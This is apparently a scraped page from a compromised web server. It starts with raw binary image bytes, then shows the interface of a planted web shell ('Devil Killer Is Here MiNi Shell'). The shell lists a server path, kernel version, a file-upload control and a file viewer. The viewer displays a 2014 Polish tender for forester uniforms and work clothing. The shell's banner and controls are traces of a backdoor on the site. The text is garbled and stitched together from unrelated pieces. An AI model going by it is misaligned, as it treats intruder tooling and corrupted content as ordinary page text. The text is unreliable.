JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140218/56688-N-2014.html

<p class="kh_header"><b>Michałowo: Dostawa sortów mundurowych leśnika oraz środków ochrony indywidualnej, odzieży i obuwia roboczego do Nadleśnictwa Żednia w roku 2014</b><br>
<b>Numer ogłoszenia: 56688 - 2014; data zamieszczenia: 18.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Żednia , Żednia 5, 16-050 Michałowo, woj. podlaskie, tel. 085 7175251, 7175252, faks 085 7175252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bialystok.lasy.gov.pl/web/zednia</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sortów mundurowych leśnika oraz środków ochrony indywidualnej, odzieży i obuwia roboczego do Nadleśnictwa Żednia w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
Dostawa mundurów, oznak i przedmiotów uzupełniających do mundurów leśnika wykonanych według wzorów określonych: 
1.1. Zarządzeniem Nr 68 Dyrektora Generalnego Lasów Państwowych z dnia 20 lipca 2001r. w sprawie określenia rodzajów tkanin, jakie mogą być używane do szycia mundurów leśnika.
1.3. Zarządzeniem nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 14 marca 2005r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnika. 
1.4. Zarządzeniem nr 44 Dyrektora Generalnego Lasów Państwowych z dnia 14 maja 2012r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnika. 
1.5. Zarządzeniem nr 54 Dyrektora Generalnego Lasów Państwowych z dnia 6 lipca 2012r. w sprawie zmiany Zarządzenia nr 44 Dyrektora Generalnego Lasów Państwowych z dnia 14 maja 2012r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnik.
1.6. Zarządzenie nr 62 Dyrektora Generalnego Lasów Państwowych z dnia 15 lipca 2013 r., w sprawie wzorca oraz zasad użytkowania mundurów leśnika przez pracowników Lasów Państwowych. 
Dostawa odzieży i obuwia roboczego, do Nadleśnictwa Żednia w roku 2014, podzielona na dwie części (pakiety).
Pakiet nr 1 - sorty mundurowe leśnika  
Pakiet nr 2 - odzież i obuwie robocze 
Szczegółowy opis przedmiotu zamówienia zawiera (Załącznik nr 1 do SIWZ)
2. Nazwy i kody CPV dotyczące przedmiotu zamówienia określone  we Wspólnym Słowniku Zamówień:
3. Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest dostarczyć przed podpisaniem umowy ważne świadectwa, iż elementy umundurowania będące przedmiotem dostawy są zgodne z zapisami techniczno-technologicznej dokumentacji stanowiącej opis przedmiotu zamówienia, przedstawiając Zamawiającemu kopie świadectwa, wydanego przez Ośrodek Rozwojowo-Wdrożeniowy Lasów Państwowych w Bedoniu Nowy Bedoń, ul. Sienkiewicza 19, 95-020 Andrespol na zgodności elementów munduru będących przedmiotem dostawy ze wzorcem munduru leśnika zatwierdzonym przez Dyrektora Generalnego Lasów Państwowych Zarządzeniem nr 62 Dyrektora Generalnego Lasów Państwowych z dnia 15 lipca 2013 w sprawie wzorca oraz zasad użytkowania mundurów leśnika przez pracowników Lasów Państwowych.
4.  Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest do prowadzenia w trakcie obowiązywania umowy punktu wydawania sortów mundurowych w odległości nie większej niż 40 km od siedziby Zamawiającego, gwarantującego możliwość przymiarki i odbioru elementów umundurowania upoważnionym pracownikom Zamawiającego. Wykonawca zobowiązany jest do pisemnego (pod rygorem nieważności) poinformowania Zamawiającego, w terminie 14 dni od podpisania umowy, o adresie w/w punktu wydawania sortów mundurowych i odzieży BHP. W przypadku niewywiązania się przez Wykonawcę z powyższych obowiązków, Zamawiający uprawniony jest do odstąpienia od umowy na dostawę sortów mundurowych łączącej go z Wykonawcą w terminie 30 dni, od dnia kiedy Zamawiający powziął wiadomość o okolicznościach uzasadniających odstąpienie od umowy z w/w przyczyny. 
5. Zamawiającemu oraz upoważnionym przez niego pracownikom przysługuje prawo do odbioru przedmiotu dostawy bezpośrednio w w/w punkcie wydawania sortów mundurowych i odzieży BHP.
Dostawy elementów umundurowania oraz środków ochrony indywidualnej, odzieży i obuwia roboczego będą realizowane sukcesywnie przy zachowaniu następujących form realizacji zamówienia
- indywidualnie, sorty mundurowe i odzież BHP dla poszczególnych, uprawnionych pracowników, w oparciu o upoważnienie (w uprzednio uzgodnionej formie) wydane przez Zamawiającego, w punkcie sprzedaży Wykonawcy, oddalonym nie więcej niż 40 km od siedziby Zamawiającego, w uzgodnionych z nimi ilościach, rozmiarach, rodzajach sortymentu i terminach, nie dłuższych niż 10 dni od złożenia zamówienia indywidualnego (podstawowa forma realizacji przedmiotu zamówienia),
- lub poprzez częściowe dostawy przedmiotu zamówienia do siedziby Zamawiającego, zgodnie z pisemnymi zamówieniami i w terminach uprzednio uzgodnionych z Zamawiającym, nie dłuższych niż 10 dni  od daty wpływu zamówienia do Wykonawcy. 
6. Dodatkowe warunki dotyczące przedmiotu zamówienia: 
a) Termin płatności: do 14 dni od daty otrzymania faktury.
b) Nie przewiduje się zaliczek na poczet materiałów.
c) Forma zapłaty - jak we wzorze umowy - załącznik nr 8 do specyfikacji istotnych warunków zamówienia.
d) Zamawiający zastrzega możliwość redukcji zamówienia. Określone w formularzu oferty ilości przedmiotu zamówienia są ilościami szacunkowymi 
i nie zobowiązują Zamawiającego do realizacji zamówienia w pełnych ilościach.     
e) Zamawiający zastrzega możliwość  zmiany ilości poszczególnych elementów sortów mundurowych w trakcie realizacji umowy, pod warunkiem, 
iż  wynagrodzenie Wykonawcy nie ulegnie zwiększeniu.
f) Zamawiający zastrzega prawo unieważnienia postępowania na podstawie art. 93 ust. 1 i ust. 2 ustawy prawo zamówień publicznych.
g) Wykonawca zapewni co najmniej 24 miesięczną (liczoną od daty dostawy/odbioru przez osoby uprawnione) gwarancję na dostarczone przedmioty zamówienia na warunkach określonych w umowie
h) Wykonawca wskaże w ofercie (oświadczenie na formularzu oferty) część zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
4. Opis części zamówienia, jeżeli zamawiający dopuszcza składanie ofert częściowych
Zamawiający dopuszcza składanie ofert częściowych na jeden lub dwa pakiety.
1. Pakiet Nr 1: sorty mundurowe leśnika
Łączną ilość zamówienia w rozbiciu na poszczególne elementy umundurowania zawiera tabela poniżej:
Mundur wyjściowy Jednostka miary Ilość jednostek
Marynarka męska - gabardyna lub tropik	sztuka	1
Marynarka damska- gabardyna lub tropik	sztuka	1
Spodnie męskie- gabardyna lub tropik	sztuka	9
Marynarka męska- gabardyna z wykończeniem oleofobowym	sztuka	6
Marynarka damska - gabardyna z wykończeniem oleofobowym	sztuka	1
Spodnie męskie- gabardyna z wykończeniem oleofobowym	sztuka	10
Spodnie damskie - gabardyna z wykończeniem oleofobowym	sztuka	3
Spódnica - gabardyna lub tropik	sztuka	2
Spódnica - gabardyna z wykończeniem oleofobowym	sztuka	2
Koszula męska	sztuka	15
Bluzka damska	sztuka	4
Koszula męska - bawełna 100%	sztuka	21
Bluzka damska - bawełna 100%	sztuka	3
Krawat sztuka	9
Czapka wyjściowa z wizerunkiem orła	sztuka	2
Kurtka męska 	sztuka	5
Kurtka damska	sztuka	3
Szalik sztuka	4
Rękawice męskie	para	9
Skarpety letnie termoaktywne	para	23
Skarpety przejściowe termoaktywne	para	24
Skarpety zimowe termoaktywne	para	43
Półbuty męskie	para	15
Półbuty damskie	para	5
Mundur codzienny leśnika	Zamawiana ilość
Koszula męska z długim rękawem	sztuka	9
Bluzka damska z długim rękawem	sztuka	1
Koszula męska z krótkim rękawem	sztuka	8
Koszula męska z długim rękawem - bawełna 100%	sztuka	19
Bluzka damska z długim rękawem - bawełna 100%	sztuka	1
Koszula męska z krótkim rękawem - bawełna 100%	sztuka	11
Bluzka damska z krótkim rękawem - bawełna 100%	sztuka	1
Sweter sztuka	43
Kamizelka	sztuka	9
Bluza z polaru typu windstoper	sztuka	33
Kurtka wierzchnia sztuka	15
Czapka zimowa z wizerunkiem orła	sztuka	5
Peleryna	sztuka 3
Półbuty typu Sympatex	para	41
Półbuty typu Gore-tex	para	10
Mundur terenowy leśnika Zamawiana ilość
Bluza z kamizelką letnią	sztuka	12
Spodnie letnie	sztuka	60
Czapka letnia terenowa z wizerunkiem orła	sztuka	10
Kurtka zimowa	sztuka	10
Spodnie zimowe	sztuka	16
Czapka zimowa terenowa z wizerunkiem orła	sztuka	8
Trzewiki typu Sympatex	para	21
Trzewiki typu Gore-tex niskie	para	6
Trzewiki typu Gore-tex wysokie	para	1
Trzewiki typu Sympatex z ociepleniem typu Thinsulate	para	8
Trzewiki typu Gore-tex niskie z ociepleniem typu Thinsulate	para	11
Trzewiki typu Gore-tex  wysokie z ociepleniem typu Thinsulate	para	12
Oznaki Zamawiana ilość Oznaki służbowe wyhaftowane bajorkiem	para	5
Szczegółowy opis tej części przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.
2. Pakiet Nr 2: Środki ochrony indywidualnej, odzież i obuwie robocze, odpowiadające wymaganiom określonym w Polskich Normach oraz posiadające odpowiednio certyfikat albo deklarację zgodności z tymi normami, w ilościach jak niżej:
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA PAKIET NR 2
Lp.	Przedmiot  zamówienia Jednostka miary Ilość
1. Czapka robocza ocieplana typu baseball z opuszczanymi nausznikami mieszanka bawełny (50%) i poliamidu (50%), o min. gramaturze 240 g/m2 szt.	3
2. Czapka robocza letnia typu baseball  mieszanka bawełny (35%) i poliestru (65%), o min. gramaturze 280 g/m2,	szt.	5
3. Ubranie robocze dwuczęściowe typ szwedzki - tkanina mieszanka bawełny (35%) i poliestru (65%), o gramaturze 290 g/m2 o kurczliwości  do 2%
Bluza zapinana. Spodnie ogrodniczki z przednią kieszenią zapinaną na zamek, Szelki z wszytą gumą ułatwiającą dopasowanie spodni do sylwetki ciała. Kolor zielony komplet	7
4. Buty gumowe męskie do kolan, podeszwa z protektorowaniem przeciwpoślizgowym, z wyściółką z grubej tkaniny drapanej (dopuszczalna wyściółka z tkaniny wyjmowana),  kolor zielony	para	13
5. Płaszcz przeciwdeszczowy podgumowany z kapturem materiał: PVC/Poliester/PVC 
 kaptur ze sznurkiem 
 zamek błyskawiczny pod rzepem 
 przeciwwiatrowe mankiety	szt.	29
6. Buty filcowo-gumowe wysokość buta min. 33 cm podeszwa z protekterowaniem przeciwpoślizgowym, wyściółka z tkaniny wyjmowana, wykończone u góry materiałem wodoodpornym z opcją zawiązywania, kolor czarny para	13
7. Fartuch ochronny drelichowy	szt.	53
8. Koszula flanelowa z długim rękawem	szt.	7
9. Kalesony: co najmniej 70% bawełny	szt.	7
10. Trzewiki przemysłowe: wodoodporne z wkładką antyprzebiciową w podeszwie i stalową osłoną palców, kolor czarny	para 4
11. Ubranie ocieplane typu szwedzkiego. Kurtka  + spodnie ogrodniczki . Materiał o gramaturze  co najmniej 290 g/m2. Kliny wszyte na dole nogawek (na zamek błyskawiczny) pozwalające dopasować szerokość spodni do buta. Kolor zielony.	komplet	6
12. Kamizelka ocieplana: wykonana z tkaniny 35% bawełny i 65% poliestru - ocieplana poliestrem kolory: zielony	szt.	3
13. Buty filcowo gumowe sznurowane z przodu z wyjmowaną wkładką  z naturalnej wełny, kolor zielony, wysokość buta min. 33cm	szt.	50
14. Buty gumowe męskie do kolan, podeszwa z protektorowaniem przeciwpoślizgowym, z wyściółką z grubej tkaniny drapanej (dopuszczalna wyściółka z tkaniny wyjmowana), wykończone u góry materiałem wodoodpornym z opcją zawiązywania, kolor zielony.	szt.	50
15. Okulary przeciwsłoneczne. Okulary mają mieć estetyczną, metalową lub plastikową oprawę i szkła o specjalnych właściwościach. Zastosowany materiał ma powodować, że szkła samoczynnie w zależności od warunków zewnętrznych (w przyćmionym świetle, podczas kierowania pojazdem - nocą we mgle deszczu mają zaostrzać kontrast i rozjaśniać obraz - eliminować niebieskie widmo światła) w czasie słonecznej pogody mają ciemnieć - absorbować promienie UV.	szt.	46
16. Rękawice ochronne do kierowania pojazdem.
W całości wykonane z miękkiej skóry naturalnej 100%, kolor czarny.	para	29
17. Rękawice do oprysków z tworzywa odpornego na działanie rozpuszczalników organicznych.	para	2
18. Kombinezon do oprysków przy stosowaniu środków chemicznych.	szt.	2
19. Ubranie całoroczne dla stażysty oraz robotnika pomocniczego wykonującego pracę w terenie leśnym: Kurtka + spodnie ogrodniczki. Tkanina bretex, kolor  ciemna oliwka. Kurtka  na podszewce  z polarową podpinką z możliwością odpinania, zapinana na zamek błyskawiczny. Spodnie typu ogrodniczki na szelkach z polarowym wypinanym wkładem.	szt.	6.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0, 18.14.00.00-2, 18.20.00.00-1, 18.30.00.00-2, 18.40.00.00-3, 18.80.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność objęta przedmiotem zamówienia nie wymaga posiadania specjalnych uprawnień, w związku z czym Zamawiający nie wymaga posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz  wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych głównych dostaw, w okresie ostatnich 3 lat przed upływem składania ofert w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, wraz z podaniem  ich wartości, przedmiotu dat ich wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Dla pakietu nr 1: dwie dostawy sortów mundurowych o wartości nie    mniejszej niż 100 tys. zł 
Dla Pakietu nr 2: dwie dostawy odzieży bhp o wartości nie mniejszej niż 
25 tys. zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, oświadczy że spełnia w/w warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, oświadczy że spełnia w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, oświadczy że spełnia w/w warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3. Zamawiający wymaga także dołączenia do oferty:
a) wypełnionego i podpisanego  Formularza oferty, z wykorzystaniem wzoru stanowiącego załącznik nr 2 do SIWZ,
b). wypełnionego i podpisanego formularza cenowego z wykorzystaniem wzorów stanowiących załącznik nr 3 a lub 3b do SIWZ, (w zależności od pakietu na który dostawca składa ofertę),
c) informacja z listą podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych albo informację o tym, że wykonawca nie należy do grupy kapitałowej  (wg wzoru - załącznik nr 7).
d) pełnomocnictwa podmiotów występujących wspólnie (np. konsorcjum, spółek cywilna),
j) dokumentu/ów określającego zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy,
k) wykazali i udokumentowali spełnienie wymogów jakościowych w zakresie dostaw będących przedmiotem zamówienia:</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie postanowienia zawiera wzór umowy stanowiący załącznik nr 8 do specyfikacji istotnych warunków  zamówienia .
2. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.
3. Zamawiający dopuszcza możliwość dokonania zmiany warunków umowy w przypadkach, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_zednia/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Żednia, Żednia 5, 16-050 Michałowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2014 godzina 09:30, miejsce: Sekretariat Nadleśnictwa Żednia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sorty mundurowe leśnika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia zawiera (Załącznik nr 1 do SIWZ oraz formularz cenowy załącznik nr 3a do SIWZ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.14.00.00-2, 18.20.00.00-1, 18.10.00.00-0, 18.30.00.00-2, 18.40.00.00-3, 18.80.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odzież i obuwie BHP.</p>
